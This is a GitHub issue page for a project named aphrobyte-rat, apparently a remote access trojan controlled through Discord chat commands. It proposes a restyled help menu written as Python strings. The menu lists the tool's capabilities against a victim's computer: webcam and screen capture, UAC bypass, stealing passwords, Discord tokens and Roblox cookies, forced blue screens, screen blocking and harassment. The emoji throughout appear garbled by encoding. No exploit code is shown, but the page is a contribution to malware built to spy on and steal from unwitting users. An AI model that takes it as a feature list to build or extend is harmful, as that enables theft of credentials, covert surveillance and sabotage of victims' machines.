aphrobyte-rat icon indicating copy to clipboard operation
aphrobyte-rat copied to clipboard

Just A Little Add-On to make the !Help Look Better.....

Open ghost opened this issue 10 months ago â€ĸ 0 comments

help_menu = f"""
Available commands for **{os.getlogin()}** :

**!help** ❓ - Shows this message
**!startup** 🚀 - Adds the file to startup.
**!exit** ❌ - Stop the RAT from working.
**!usagelist** 📜 - Returns a list of active users.
**!admin_check** đŸ›Ąī¸ - Checks if you are admin on target computer.
**!bypass_uac** 🔓 - Attempts to bypass UAC to get admin privileges.
**!shell** đŸ’ģ - Run a shell command

`-----SURVEILLANCE-----` 👀

**!screenshot** 📸 - Sends a screenshot of the target machine
**!idletime** âŗ - Displays for how long the user has been AFK
**!webcam_capture** 📷 - Capture a picture of the webcam.
**!tasklist** 📝 - Returns a list of active tasks.

`-----FILE MANAGEMENT-----` đŸ—‚ī¸

**!chdir** 🏠 - Changes the current directory. **!chdir <** to go back one directory.
**!chdisk** đŸ’Ŋ - Changes the current disk. (E, C, D, etc.)
**!ls** 📂 - Displays all items in the current directory.
**!download** âŦ‡ī¸ - Downloads a file from the specified path.
**!upload** âŦ†ī¸ - Uploads a file to the specified path.
**!taskkill** âš”ī¸ - Kills the specified task.
**!startfile** â–ļī¸ - Starts a file.
**!delfile** đŸ—‘ī¸ - Deletes a file.
**!hidefile** đŸ•ĩī¸â€â™‚ī¸ \ **!unhidefile** đŸ‘ī¸ - Hides/unhides a file.

`-----INFORMATION GATHERING-----` đŸ•ĩī¸â€â™€ī¸

**!whois** 👤 - Prints the user's name
**!getip** 🌍 - Gets the current user's IP address
**!clipboard** 📋 - Returns a string of the user's clipboard.
**!grabpasswords** 🔑 - Steal all the passwords from the device.
**!grabroblox** 🎮 - Grabs the user's Roblox account cookie.
**!hardware_list** 💡 - Lists the user's hardware on newlines.
"""

help_menu2 = """
**!grabdiscord** đŸ’Ŧ - Fetches the user's Discord account token.

`-----SANCTIONING-----` 🔨

**!bsod** đŸ’Ĩ - Blue screens the computer.
**!disabletaskmgr** \ **!enabletaskmanager** đŸšĢ \ ✅ - Disable/enable task manager.
**!logoff** đŸšĒ - Logs the user off.
**!shutdown** 📴 - Shuts the user's PC off.
**!restart** 🔄 - Restarts the user's PC.
**!blockscreen** đŸšĢ - Blocks the user's screen. (IRREVERSIBLE UNTIL USER RESTARTS)
**!critproc** âš ī¸ - Makes the RAT a critical process, meaning if it's task killed the user will get a BSOD.
**!screenflip** 🔄 - Rotates the user's screen 90 degrees.

`-----FUN-----` 🎉
**!write** âœī¸ - Writes a sentence then presses enter.
**!setclipboard** 📋 - Sets the clipboard to the specified string of text.
**!forcedesktop** đŸ–Ĩī¸ - Sends the user on desktop automatically.
**!messmouse** đŸ–ąī¸ - Shakes the user's cursor when they try to move the mouse, run this command again to stop.
**!opensite** 🌐 - Opens a site on the user's browser.
**!key_press** âŒ¨ī¸ - Press a key.
**!showtaskbar** đŸ–Ĩī¸ \ **!hidetaskbar** 👀

`-----COMMUNICATION-----` 📞

**!questionmsg** ❔ - Sends the user a question message.
**!warningmsg** âš ī¸ - Sends the user a warning message.
**!errormsg** ❗ - Sends the user an error message.
**!infomsg** â„šī¸ - Sends the user an informative message.

ghost avatar Jan 30 '25 17:01 ghost